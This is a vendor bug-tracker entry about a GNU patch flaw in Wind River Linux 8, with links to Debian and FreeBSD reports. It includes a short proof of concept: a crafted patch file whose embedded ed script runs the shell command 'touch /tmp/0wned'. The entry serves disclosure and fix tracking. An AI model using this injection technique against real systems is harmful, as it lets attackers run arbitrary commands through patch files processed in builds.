Fixed
Created: Apr 7, 2018
Updated: Dec 3, 2018
Resolved Date: May 9, 2018
Found In Version: 8.0
Fix Version: 8.0.0.26
Severity: Standard
Applicable for: Wind River Linux 8
Component/s: Build & Config
The problem was pointed out in several internet posts when someone found buried in the HN /new queue as a simple link to the Debian bug tracker.
https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=894667#19
--
The steps to reproduce show the problem in more detail. Hopefully a patch will be submitted for GNU patch to resolve the problem.
FreeBSD fixed a similar problem here:
https://www.freebsd.org/security/advisories/FreeBSD-SA-15:18.bsdpatch.asc
---- demonstration below ---
% cd /tmp
% cat<<EOF>evil.patch
--- /dev/null 2018-13-37 13:37:37.000000000 +0100
+++ b/beep.c 2018-13-37 13:38:38.000000000 +0100
1337a
1,112d
!touch /tmp/0wned; ls -la /tmp/0wned
.
EOF
% touch beep.c
% patch < evil.patch
?
?
-rw-r--r-- 1 jwessel users 0 Apr 5 15:58 /tmp/0wned
?
patch: **** ed FAILED